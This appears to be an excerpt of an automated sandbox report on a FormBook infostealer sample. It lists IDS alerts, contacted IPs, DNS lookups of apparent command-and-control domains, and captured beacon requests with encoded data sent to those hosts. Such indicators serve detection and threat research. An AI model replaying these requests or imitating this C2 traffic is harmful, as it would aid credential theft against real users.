                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 162.241.85.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50010 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50031 -> 162.241.85.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50031 -> 162.241.85.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50023 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50023 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 162.241.85.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 185.179.189.193:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49993 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49993 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50019 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50019 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 3.33.130.190:80
                Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
                Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49747
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49957
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                Source: global trafficHTTP traffic detected: GET /sgqz/?IrPLc=Knb4R&08rl=z40UQA4uEilCXXdlmYjF9n5vKa/i580zo4gniHRlmWBqOO2Mc3/KIA1Ve2y+wPMV5ve5FEwYeJdlmAqR+Re6XDDxkmNjF6zWKZUvC2ZhY9W/S87H8cuWRnBzaMg+4CPVpmh1XXg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.spencermarcu.movieConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /r0lv/?IrPLc=Knb4R&08rl=RQL5uypvFlMwQi2GLIId0mZrz/SGN6i+q5FrzH0xA9hYrhUAdlgXlQAJmAAoJGPgrNgV6jvxdXCBcEDPMJZTV+2H43d2bqABGV4siYI9WteDJE2TAna2JNgpF+cMEoE2aLQ71LA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.trifecta.centerConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /wm94/?08rl=7kS6gWg4TGPkiMLuCHnIHRTQ3qYM06eaigrXILamhmyeZN//hX0ZBV/Jvv1z6XxjKqArJvf1S0/GIkuUkrvXIITmY0x+We/Q9CJ8aFTCC7CnYVlt7PWp/pqkdTJVVi6hLa/q3Tk=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.college-help.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /3fus/?IrPLc=Knb4R&08rl=N37/9h28dFqTFTbynIc+O1znseVxHIXZE7DXniB1wngIxlCrnEyOGvsAdKxjrp67etIg8JUbEYHl+7CXxm3m2jtEXrZrKAlhk2xQwbijvW4W0bJjguvuk21AJD3IIpJr9ZOXnsQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.whiteshieldinsure.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /q5gi/?08rl=Qxz+9oQawQanAQHYdTYz9C9Qi+WU18FrCJDOUV5r+dn1dNZo7gMQdwRJpVqmN4EEk1WeYDWgHj4103TlxFaSFaPEmGUQsOZ0B0zIPDTJhKA7TnEqTx18z1JHq5v0eXuzQE4RJLA=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.1daysober.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /yhso/?IrPLc=Knb4R&08rl=qshK0E1CF4G1Sir9YwhfIyIJsH40nusxx8ay40x9lBPpumonqOgOHkS7CUCTyeg3KaY3G5xJAfwXsCu9cW8WruEAiYD2w0a2Z1Gg4cekeTUI2P7TVw+M8wQ7uq12F63bSznXgbg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.plyvik.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /0g3j/?08rl=NUHSu4JJ/Kg1VJPQXLy5z6m/27O+diehBYTKyfkdb4Gb1jUS0BQgTHwq/v5TPkjaPgaSjERVsEgj0/u2pw6ETGFSwQcSpI7WWZojw8+UmAVwwTMD/Kk0887QkMTIKRMf3/bI2Cw=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.gucciqueen.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /gls1/?08rl=Uietig4+TC7NFrmVovLlYTtapWMzZT+64cq6Twhm5LT452F0v+MmXRVXnhGmnx2GSIt0lnB8FurFze9iLSXa+V/AuOXwrYJIOTbzpbQadjdR6tTkWXHxVhPzUUbSeXZg4P1XpJA=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.jivatop.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /dse0/?IrPLc=Knb4R&08rl=8iHtcJIG/+RIWBvECvIOVB8mvr8kzBU7qmWzhsUPOht4KTOzG0/L7NLTG/7/XZMHEoTZ0gMQWo8dRZRzp2QjseON87NIWLv0fW4/6GkG2GuzRp6o1iE2qd+7VCEw8b7pInbsgMs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.seraph.bestConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /qfli/?08rl=AhjJgGShipZbwfgYBrBs/D/6J4md1mWyL0Dn1+DGXWSLPyEvzD8Lt8QIg++AaZimhExVJRS0A24jbF5v5l0xXr0xTbRwbZ4D/8YFIQmCxUZGKyC9Et+i1GoSGLb+TRIhDWVWAYM=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.scottlasher.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /e6d9/?08rl=juqeQrGFcwXITpngL7PunlS6Yziuw637mWk4bg3F0fjFlN57WeOsxPDa4F2hA37igEjN+72Gm9ppMBBjdsyFL/sZnzl7KntfJA7AgFspXms44/5oaxJKfEyU2eFPJ97BOLt+kFY=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.6686vi38.appConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /m9ej/?08rl=gfUsZufFmKDBP/wr4I3wawh27yThqd6e8DgUc02Caz1AXZo67KCVFRTwEz2BahWw7XHlSefPEEQngnWsZ2+57h2QZ8Rh1TFPGeT9177P1cahfBJtA0MilqntdvK9z/bAGtCFsek=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.papampalli.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficHTTP traffic detected: GET /84o5/?08rl=FhnoB6sXlwwUJ2S0xbdNJQGNi52zNHIg2XWwnAKV1i9NMjPku/WS5PsHH4WgPI0VJn/Y1dNZFJ1NDQC+U2kAsgQSVBacTkqlvkMhlEkshTZpF7vS/ppR4Ym+5wvF5WrQLwolbC4=&IrPLc=Knb4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.yourwebbuzz.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                Source: global trafficDNS traffic detected: DNS query: www.spencermarcu.movie
                Source: global trafficDNS traffic detected: DNS query: www.cybermisha.store
                Source: global trafficDNS traffic detected: DNS query: www.trifecta.center
                Source: global trafficDNS traffic detected: DNS query: www.college-help.info
                Source: global trafficDNS traffic detected: DNS query: www.whiteshieldinsure.org
                Source: global trafficDNS traffic detected: DNS query: www.1daysober.com
                Source: global trafficDNS traffic detected: DNS query: www.plyvik.info
                Source: global trafficDNS traffic detected: DNS query: www.gucciqueen.shop
                Source: global trafficDNS traffic detected: DNS query: www.jivatop.online
                Source: global trafficDNS traffic detected: DNS query: www.seraph.best
                Source: global trafficDNS traffic detected: DNS query: www.scottlasher.org
                Source: global trafficDNS traffic detected: DNS query: www.6686vi38.app
                Source: global trafficDNS traffic detected: DNS query: www.papampalli.shop
                Source: global trafficDNS traffic detected: DNS query: www.yourwebbuzz.net
                Source: unknownHTTP traffic detected: POST /r0lv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.trifecta.centerOrigin: http://www.trifecta.centerConnection: closeContent-Length: 209Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.trifecta.center/r0lv/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200Data Raw: 30 38 72 6c 3d 63 53 6a 5a 74 46 64 43 46 6b 6b 4b 58 30 75 48 47 61 34 5a 79 55 70 2b 38 5a 33 2f 49 49 6a 54 70 2f 68 59 35 51 49 74 55 4f 39 62 68 42 41 6c 62 7a 67 74 69 45 64 70 68 6a 4e 59 45 58 33 59 70 4e 64 2b 39 6a 44 56 47 45 72 53 5a 30 32 70 53 6f 70 2b 4c 66 4c 6b 35 6e 63 7a 44 4b 34 4a 53 47 30 68 72 34 38 75 63 36 4f 70 4f 69 6a 70 4a 6b 2b 62 49 4f 63 72 55 66 78 35 47 71 63 79 5a 70 41 70 6f 64 71 79 67 5a 76 69 76 47 77 37 63 6f 7a 43 6c 4b 35 56 59 66 62 7a 34 4b 30 32 68 78 52 39 6d 6c 7a 4e 42 44 32 49 66 62 31 75 32 45 46 56 79 44 4c 70 4c 34 55 4d 4d 61 34 67 63 78 61 51 57 6d 58 33 6d 63 4c 63 Data Ascii: 08rl=cSjZtFdCFkkKX0uHGa4ZyUp+8Z3/IIjTp/hY5QItUO9bhBAlbzgtiEdphjNYEX3YpNd+9jDVGErSZ02pSop+LfLk5nczDK4JSG0hr48uc6OpOijpJk+bIOcrUfx5GqcyZpApodqygZvivGw7cozClK5VYfbz4K02hxR9mlzNBD2Ifb1u2EFVyDLpL4UMMa4gcxaQWmX3mcLc
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 04:22:27 GMTServer: ApacheLast-Modified: Mon, 04 Nov 2024 18:50:02 GMTETag: "49d-6261ac0a04ab1"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 04:22:29 GMTServer: ApacheLast-Modified: Mon, 04 Nov 2024 18:50:02 GMTETag: "49d-6261ac0a04ab1"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 04:22:32 GMTServer: ApacheLast-Modified: Mon, 04 Nov 2024 18:50:02 GMTETag: "49d-6261ac0a04ab1"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 